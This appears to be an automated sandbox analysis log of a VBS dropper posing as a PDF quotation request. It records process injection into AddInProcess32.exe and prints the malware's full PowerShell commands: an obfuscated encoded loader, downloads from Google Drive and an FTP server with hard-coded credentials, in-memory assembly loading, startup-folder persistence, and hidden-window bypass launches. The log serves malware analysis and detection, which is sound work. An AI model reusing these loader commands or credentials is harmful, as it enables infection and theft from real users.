                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 478000
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 479000
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 47E000
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 80A008
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe22_2_00412132
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 22_2_00419662 mouse_event,22_2_00419662
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $qKKzc = 'Ow' + [char]66 + '9ADsAKQAgACkAIAAnAEQAMQ' + [char]66 + 'EACAARAAnACAALAAgAFgAUA' + [char]66 + 'VAHUAaAAkACAALAAgACcAaA' + [char]66 + '0AHQAcA' + [char]66 + 'zADoALwAvAHMAaQ' + [char]66 + 'tAG8Abg' + [char]66 + 'hAHMAdA' + [char]66 + 'vAGwAZQ' + [char]66 + 'yAGMAaQ' + [char]66 + '1AGMALg' + [char]66 + 'yAG8ALw' + [char]66 + 'pAG0AYQ' + [char]66 + 'nAGUAcwAvAHMAZQ' + [char]66 + 'yAHYAZQ' + [char]66 + 'yAC4AdA' + [char]66 + '4AHQAJwAgACgAIA' + [char]66 + 'dAF0AWw' + [char]66 + '0AGMAZQ' + [char]66 + 'qAGIAbw' + [char]66 + 'bACAALAAgAGwAbA' + [char]66 + '1AG4AJAAgACgAZQ' + [char]66 + 'rAG8Adg' + [char]66 + 'uAEkALgApACAAJw' + [char]66 + 'JAFYARg' + [char]66 + 'yAHAAJwAgACgAZA' + [char]66 + 'vAGgAdA' + [char]66 + 'lAE0AdA' + [char]66 + 'lAEcALgApACcAMQ' + [char]66 + 'zAHMAYQ' + [char]66 + 'sAEMALgAzAHkAcg' + [char]66 + 'hAHIAYg' + [char]66 + 'pAEwAcw' + [char]66 + 'zAGEAbA' + [char]66 + 'DACcAKA' + [char]66 + 'lAHAAeQ' + [char]66 + 'UAHQAZQ' + [char]66 + 'HAC4AKQAgAFoAYw' + [char]66 + 'CAGMAYQAkACAAKA' + [char]66 + 'kAGEAbw' + [char]66 + 'MAC4Abg' + [char]66 + 'pAGEAbQ' + [char]66 + 'vAEQAdA' + [char]66 + 'uAGUAcg' + [char]66 + 'yAHUAQwA6ADoAXQ' + [char]66 + 'uAGkAYQ' + [char]66 + 'tAG8ARA' + [char]66 + 'wAHAAQQAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TAFsAOwApACAAKQAgACcAQQAnACAALAAgACcAkyE6AJMhJwAgACgAZQ' + [char]66 + 'jAGEAbA' + [char]66 + 'wAGUAUgAuAGcAUw' + [char]66 + '6AEMAQg' + [char]66 + 'sACQAIAAoAGcAbg' + [char]66 + 'pAHIAdA' + [char]66 + 'TADQANg' + [char]66 + 'lAHMAYQ' + [char]66 + 'CAG0Abw' + [char]66 + 'yAEYAOgA6AF0AdA' + [char]66 + 'yAGUAdg' + [char]66 + 'uAG8AQwAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TAFsAIAA9ACAAWg' + [char]66 + 'jAEIAYw' + [char]66 + 'hACQAIA' + [char]66 + 'dAF0AWw' + [char]66 + 'lAHQAeQ' + [char]66 + 'CAFsAOwAnACUASQ' + [char]66 + 'oAHEAUg' + [char]66 + 'YACUAJwAgAD0AIA' + [char]66 + 'YAFAAVQ' + [char]66 + '1AGgAJAA7ACkAIA' + [char]66 + 'nAFMAeg' + [char]66 + 'DAEIAbAAkACAAKA' + [char]66 + 'nAG4AaQ' + [char]66 + 'yAHQAUw' + [char]66 + 'kAGEAbw' + [char]66 + 'sAG4Adw' + [char]66 + 'vAEQALg' + [char]66 + '0AHoAdg' + [char]66 + 'rAHEAJAAgAD0AIA' + [char]66 + 'nAFMAeg' + [char]66 + 'DAEIAbAAkADsAOA' + [char]66 + 'GAFQAVQA6ADoAXQ' + [char]66 + 'nAG4AaQ' + [char]66 + 'kAG8AYw' + [char]66 + 'uAEUALg' + [char]66 + '0AHgAZQ' + [char]66 + 'UAC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAWwAgAD0AIA' + [char]66 + 'nAG4AaQ' + [char]66 + 'kAG8AYw' + [char]66 + 'uAEUALg' + [char]66 + '0AHoAdg' + [char]66 + 'rAHEAJAA7ACkAdA' + [char]66 + 'uAGUAaQ' + [char]66 + 'sAEMAYg' + [char]66 + 'lAFcALg' + [char]66 + '0AGUATgAgAHQAYw' + [char]66 + 'lAGoAYg' + [char]66 + 'PAC0Adw' + [char]66 + 'lAE4AKAAgAD0AIA' + [char]66 + '0AHoAdg' + [char]66 + 'rAHEAJAA7ACkAKA' + [char]66 + 'lAHMAbw' + [char]66 + 'wAHMAaQ' + [char]66 + 'kAC4AdA' + [char]66 + '6AHYAaw' + [char]66 + 'xACQAOwApACAAJw' + [char]Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $JwrAL = $host.Version.Major.Equals(2) ;if ( $JwrAL ) {$uVHrT = [System.IO.Path]::GetTempPath();del ( $uVHrT + '\Upwin.msu' );$FaqoI = 'https://drive.google.com/uc?export=download&id=';$jwEmr = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $jwEmr ) {$FaqoI = ($FaqoI + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$FaqoI = ($FaqoI + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$xglvh = (New-Object Net.WebClient);$xglvh.Encoding = [System.Text.Encoding]::UTF8;$xglvh.DownloadFile($URLKB, $uVHrT + '\Upwin.msu');$MYnKZ = ('C:\Users\' + [Environment]::UserName );RiWcG = ($uVHrT + '\Upwin.msu'); powershell.exe wusa.exe RiWcG /quiet /norestart ; Copy-Item 'C:\Users\user\Desktop\Quotation request YN2024-10-07pdf.vbs' -Destination ( $MYnKZ + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$lBCzSg;$qkvzt = (New-Object Net.WebClient);$qkvzt.Encoding = [System.Text.Encoding]::UTF8;$qkvzt.Credentials = new-object System.Net.NetworkCredential((-join [char[]](100,101,115,99,107,118,98,114,97,116,49)),'developerpro21578Jp@@');$lBCzSg = $qkvzt.DownloadString( 'ftp://desckvbrat1@ftp.desckvbrat.com.br/Upcrypter/01/DLL01.txt' );$qkvzt.dispose();$qkvzt = (New-Object Net.WebClient);$qkvzt.Encoding = [System.Text.Encoding]::UTF8;$lBCzSg = $qkvzt.DownloadString( $lBCzSg );$huUPX = 'C:\Users\user\Desktop\Quotation request YN2024-10-07pdf.vbs';[Byte[]] $acBcZ = [System.Convert]::FromBase64String( $lBCzSg.Replace( '?:?' , 'A' ) );[System.AppDomain]::CurrentDomain.Load( $acBcZ ).GetType('ClassLibrary3.Class1').GetMethod( 'prFVI' ).Invoke( $null , [object[]] ( 'txt.revres/segami/or.cuicrelotsanomis//:sptth' , $huUPX , 'D D1D' ) );};"Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe /stext "C:\Users\user\AppData\Local\Temp\wdxzjlwrwtnnhxspscqffyidgpjfmkcr"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe /stext "C:\Users\user\AppData\Local\Temp\ggckk"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe /stext "C:\Users\user\AppData\Local\Temp\iaqclvrm"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\kevzykrtgrszbixbneqedqimjxlmbhz.vbs"
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\nliem.ps1' ";exit
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\nliem.ps1' ";exit
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $qkkzc = 'ow' + [char]66 + '9adsakqagackaiaanaeqamq' + [char]66 + 'eacaaraanacaalaagafgaua' + [char]66 + 'vahuaaaakacaalaagaccaaa' + [char]66 + '0ahqaca' + [char]66 + 'zadoalwavahmaaq' + [char]66 + 'tag8abg' + [char]66 + 'hahmada' + [char]66 + 'vagwazq' + [char]66 + 'yagmaaq' + [char]66 + '1agmalg' + [char]66 + 'yag8alw' + [char]66 + 'pag0ayq' + [char]66 + 'naguacwavahmazq' + [char]66 + 'yahyazq' + [char]66 + 'yac4ada' + [char]66 + '4ahqajwagacgaia' + [char]66 + 'daf0aww' + [char]66 + '0agmazq' + [char]66 + 'qagiabw' + [char]66 + 'bacaalaagagwaba' + [char]66 + '1ag4ajaagacgazq' + [char]66 + 'rag8adg' + [char]66 + 'uaekalgapacaajw' + [char]66 + 'jafyarg' + [char]66 + 'yahaajwagacgaza' + [char]66 + 'vaggada' + [char]66 + 'lae0ada' + [char]66 + 'laecalgapaccamq' + [char]66 + 'zahmayq' + [char]66 + 'saemalgazahkacg' + [char]66 + 'hahiayg' + [char]66 + 'paewacw' + [char]66 + 'zageaba' + [char]66 + 'daccaka' + [char]66 + 'lahaaeq' + [char]66 + 'uahqazq' + [char]66 + 'hac4akqagafoayw' + [char]66 + 'cagmayqakacaaka' + [char]66 + 'kageabw' + [char]66 + 'mac4abg' + [char]66 + 'pageabq' + [char]66 + 'vaeqada' + [char]66 + 'uaguacg' + [char]66 + 'yahuaqwa6adoaxq' + [char]66 + 'uagkayq' + [char]66 + 'tag8ara' + [char]66 + 'wahaaqqauag0azq' + [char]66 + '0ahmaeq' + [char]66 + 'tafsaowapacaakqagaccaqqanacaalaagaccakye6ajmhjwagacgazq' + [char]66 + 'jageaba' + [char]66 + 'waguaugauagcauw' + [char]66 + '6aemaqg' + [char]66 + 'sacqaiaaoagcabg' + [char]66 + 'pahiada' + [char]66 + 'tadqang' + [char]66 + 'lahmayq' + [char]66 + 'cag0abw' + [char]66 + 'yaeyaoga6af0ada' + [char]66 + 'yaguadg' + [char]66 + 'uag8aqwauag0azq' + [char]66 + '0ahmaeq' + [char]66 + 'tafsaiaa9acaawg' + [char]66 + 'jaeiayw' + [char]66 + 'hacqaia' + [char]66 + 'daf0aww' + [char]66 + 'lahqaeq' + [char]66 + 'cafsaowanacuasq' + [char]66 + 'oaheaug' + [char]66 + 'yacuajwagad0aia' + [char]66 + 'yafaavq' + [char]66 + '1aggajaa7ackaia' + [char]66 + 'nafmaeg' + [char]66 + 'daeiabaakacaaka' + [char]66 + 'nag4aaq' + [char]66 + 'yahqauw' + [char]66 + 'kageabw' + [char]66 + 'sag4adw' + [char]66 + 'vaeqalg' + [char]66 + '0ahoadg' + [char]66 + 'raheajaagad0aia' + [char]66 + 'nafmaeg' + [char]66 + 'daeiabaakadsaoa' + [char]66 + 'gafqavqa6adoaxq' + [char]66 + 'nag4aaq' + [char]66 + 'kag8ayw' + [char]66 + 'uaeualg' + [char]66 + '0ahgazq' + [char]66 + 'uac4abq' + [char]66 + 'lahqacw' + [char]66 + '5afmawwagad0aia' + [char]66 + 'nag4aaq' + [char]66 + 'kag8ayw' + [char]66 + 'uaeualg' + [char]66 + '0ahoadg' + [char]66 + 'raheajaa7ackada' + [char]66 + 'uaguaaq' + [char]66 + 'saemayg' + [char]66 + 'lafcalg' + [char]66 + '0aguatgagahqayw' + [char]66 + 'lagoayg' + [char]66 + 'pac0adw' + [char]66 + 'lae4akaagad0aia' + [char]66 + '0ahoadg' + [char]66 + 'raheajaa7ackaka' + [char]66 + 'lahmabw' + [char]66 + 'wahmaaq' + [char]66 + 'kac4ada' + [char]66 + '6ahyaaw' + [char]66 + 'xacqaowapacaajw' + [char]
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "; $jwral = $host.version.major.equals(2) ;if ( $jwral ) {$uvhrt = [system.io.path]::gettemppath();del ( $uvhrt + '\upwin.msu' );$faqoi = 'https://drive.google.com/uc?export=download&id=';$jwemr = $env:processor_architecture.contains('64') ;if ( $jwemr ) {$faqoi = ($faqoi + '1naqdnxigvi_q1rpkazftmygmaqtjxu42') ;}else {$faqoi = ($faqoi + '1g1jmxusx9mc9vmhvrjj2xofz3ak_clot') ;};$xglvh = (new-object net.webclient);$xglvh.encoding = [system.text.encoding]::utf8;$xglvh.downloadfile($urlkb, $uvhrt + '\upwin.msu');$mynkz = ('c:\users\' + [environment]::username );riwcg = ($uvhrt + '\upwin.msu'); powershell.exe wusa.exe riwcg /quiet /norestart ; copy-item 'c:\users\user\desktop\quotation request yn2024-10-07pdf.vbs' -destination ( $mynkz + '\appdata\roaming\microsoft\windows\start menu\programs\startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[system.net.servicepointmanager]::servercertificatevalidationcallback = {$true};[system.net.servicepointmanager]::securityprotocol = [system.net.securityprotocoltype]::tls12;$lbczsg;$qkvzt = (new-object net.webclient);$qkvzt.encoding = [system.text.encoding]::utf8;$qkvzt.credentials = new-object system.net.networkcredential((-join [char[]](100,101,115,99,107,118,98,114,97,116,49)),'developerpro21578jp@@');$lbczsg = $qkvzt.downloadstring( 'ftp://desckvbrat1@ftp.desckvbrat.com.br/upcrypter/01/dll01.txt' );$qkvzt.dispose();$qkvzt = (new-object net.webclient);$qkvzt.encoding = [system.text.encoding]::utf8;$lbczsg = $qkvzt.downloadstring( $lbczsg );$huupx = 'c:\users\user\desktop\quotation request yn2024-10-07pdf.vbs';[byte[]] $acbcz = [system.convert]::frombase64string( $lbczsg.replace( '?:?' , 'a' ) );[system.appdomain]::currentdomain.load( $acbcz ).gettype('classlibrary3.class1').getmethod( 'prfvi' ).invoke( $null , [object[]] ( 'txt.revres/segami/or.cuicrelotsanomis//:sptth' , $huupx , 'd d1d' ) );};"
                    Source: unknownProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c start /min "" powershell.exe -windowstyle hidden -executionpolicy bypass -command ". 'c:\users\user\appdata\roaming\program rules nvideo\update drivers nvideo\update drivers nvideo\update drivers nvideo\nliem.ps1' ";exit
                    Source: unknownProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c start /min "" powershell.exe -windowstyle hidden -executionpolicy bypass -command ". 'c:\users\user\appdata\roaming\program rules nvideo\update drivers nvideo\update drivers nvideo\update drivers nvideo\nliem.ps1' ";exit
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $qkkzc = 'ow' + [char]66 + '9adsakqagackaiaanaeqamq' + [char]66 + 'eacaaraanacaalaagafgaua' + [char]66 + 'vahuaaaakacaalaagaccaaa' + [char]66 + '0ahqaca' + [char]66 + 'zadoalwavahmaaq' + [char]66 + 'tag8abg' + [char]66 + 'hahmada' + [char]66 + 'vagwazq' + [char]66 + 'yagmaaq' + [char]66 + '1agmalg' + [char]66 + 'yag8alw' + [char]66 + 'pag0ayq' + [char]66 + 'naguacwavahmazq' + [char]66 + 'yahyazq' + [char]66 + 'yac4ada' + [char]66 + '4ahqajwagacgaia' + [char]66 + 'daf0aww' + [char]66 + '0agmazq' + [char]66 + 'qagiabw' + [char]66 + 'bacaalaagagwaba' + [char]66 + '1ag4ajaagacgazq' + [char]66 + 'rag8adg' + [char]66 + 'uaekalgapacaajw' + [char]66 + 'jafyarg' + [char]66 + 'yahaajwagacgaza' + [char]66 + 'vaggada' + [char]66 + 'lae0ada' + [char]66 + 'laecalgapaccamq' + [char]66 + 'zahmayq' + [char]66 + 'saemalgazahkacg' + [char]66 + 'hahiayg' + [char]66 + 'paewacw' + [char]66 + 'zageaba' + [char]66 + 'daccaka' + [char]66 + 'lahaaeq' + [char]66 + 'uahqazq' + [char]66 + 'hac4akqagafoayw' + [char]66 + 'cagmayqakacaaka' + [char]66 + 'kageabw' + [char]66 + 'mac4abg' + [char]66 + 'pageabq' + [char]66 + 'vaeqada' + [char]66 + 'uaguacg' + [char]66 + 'yahuaqwa6adoaxq' + [char]66 + 'uagkayq' + [char]66 + 'tag8ara' + [char]66 + 'wahaaqqauag0azq' + [char]66 + '0ahmaeq' + [char]66 + 'tafsaowapacaakqagaccaqqanacaalaagaccakye6ajmhjwagacgazq' + [char]66 + 'jageaba' + [char]66 + 'waguaugauagcauw' + [char]66 + '6aemaqg' + [char]66 + 'sacqaiaaoagcabg' + [char]66 + 'pahiada' + [char]66 + 'tadqang' + [char]66 + 'lahmayq' + [char]66 + 'cag0abw' + [char]66 + 'yaeyaoga6af0ada' + [char]66 + 'yaguadg' + [char]66 + 'uag8aqwauag0azq' + [char]66 + '0ahmaeq' + [char]66 + 'tafsaiaa9acaawg' + [char]66 + 'jaeiayw' + [char]66 + 'hacqaia' + [char]66 + 'daf0aww' + [char]66 + 'lahqaeq' + [char]66 + 'cafsaowanacuasq' + [char]66 + 'oaheaug' + [char]66 + 'yacuajwagad0aia' + [char]66 + 'yafaavq' + [char]66 + '1aggajaa7ackaia' + [char]66 + 'nafmaeg' + [char]66 + 'daeiabaakacaaka' + [char]66 + 'nag4aaq' + [char]66 + 'yahqauw' + [char]66 + 'kageabw' + [char]66 + 'sag4adw' + [char]66 + 'vaeqalg' + [char]66 + '0ahoadg' + [char]66 + 'raheajaagad0aia' + [char]66 + 'nafmaeg' + [char]66 + 'daeiabaakadsaoa' + [char]66 + 'gafqavqa6adoaxq' + [char]66 + 'nag4aaq' + [char]66 + 'kag8ayw' + [char]66 + 'uaeualg' + [char]66 + '0ahgazq' + [char]66 + 'uac4abq' + [char]66 + 'lahqacw' + [char]66 + '5afmawwagad0aia' + [char]66 + 'nag4aaq' + [char]66 + 'kag8ayw' + [char]66 + 'uaeualg' + [char]66 + '0ahoadg' + [char]66 + 'raheajaa7ackada' + [char]66 + 'uaguaaq' + [char]66 + 'saemayg' + [char]66 + 'lafcalg' + [char]66 + '0aguatgagahqayw' + [char]66 + 'lagoayg' + [char]66 + 'pac0adw' + [char]66 + 'lae4akaagad0aia' + [char]66 + '0ahoadg' + [char]66 + 'raheajaa7ackaka' + [char]66 + 'lahmabw' + [char]66 + 'wahmaaq' + [char]66 + 'kac4ada' + [char]66 + '6ahyaaw' + [char]66 + 'xacqaowapacaajw' + [char]Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "; $jwral = $host.version.major.equals(2) ;if ( $jwral ) {$uvhrt = [system.io.path]::gettemppath();del ( $uvhrt + '\upwin.msu' );$faqoi = 'https://drive.google.com/uc?export=download&id=';$jwemr = $env:processor_architecture.contains('64') ;if ( $jwemr ) {$faqoi = ($faqoi + '1naqdnxigvi_q1rpkazftmygmaqtjxu42') ;}else {$faqoi = ($faqoi + '1g1jmxusx9mc9vmhvrjj2xofz3ak_clot') ;};$xglvh = (new-object net.webclient);$xglvh.encoding = [system.text.encoding]::utf8;$xglvh.downloadfile($urlkb, $uvhrt + '\upwin.msu');$mynkz = ('c:\users\' + [environment]::username );riwcg = ($uvhrt + '\upwin.msu'); powershell.exe wusa.exe riwcg /quiet /norestart ; copy-item 'c:\users\user\desktop\quotation request yn2024-10-07pdf.vbs' -destination ( $mynkz + '\appdata\roaming\microsoft\windows\start menu\programs\startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[system.net.servicepointmanager]::servercertificatevalidationcallback = {$true};[system.net.servicepointmanager]::securityprotocol = [system.net.securityprotocoltype]::tls12;$lbczsg;$qkvzt = (new-object net.webclient);$qkvzt.encoding = [system.text.encoding]::utf8;$qkvzt.credentials = new-object system.net.networkcredential((-join [char[]](100,101,115,99,107,118,98,114,97,116,49)),'developerpro21578jp@@');$lbczsg = $qkvzt.downloadstring( 'ftp://desckvbrat1@ftp.desckvbrat.com.br/upcrypter/01/dll01.txt' );$qkvzt.dispose();$qkvzt = (new-object net.webclient);$qkvzt.encoding = [system.text.encoding]::utf8;$lbczsg = $qkvzt.downloadstring( $lbczsg );$huupx = 'c:\users\user\desktop\quotation request yn2024-10-07pdf.vbs';[byte[]] $acbcz = [system.convert]::frombase64string( $lbczsg.replace( '?:?' , 'a' ) );[system.appdomain]::currentdomain.load( $acbcz ).gettype('classlibrary3.class1').getmethod( 'prfvi' ).invoke( $null , [object[]] ( 'txt.revres/segami/or.cuicrelotsanomis//:sptth' , $huupx , 'd d1d' ) );};"Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 16_2_10002933 cpuid 16_2_10002933
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: EnumSystemLocalesW,22_2_0045201B
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: EnumSystemLocalesW,22_2_004520B6
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,22_2_00452143
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: GetLocaleInfoW,22_2_00452393
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: EnumSystemLocalesW,22_2_00448484
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,22_2_004524BC
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: GetLocaleInfoW,22_2_004525C3
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,22_2_00452690
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: GetLocaleInfoW,22_2_0044896D
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: GetLocaleInfoA,22_2_0040F90C
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,22_2_00451D58
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: EnumSystemLocalesW,22_2_00451FD0
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
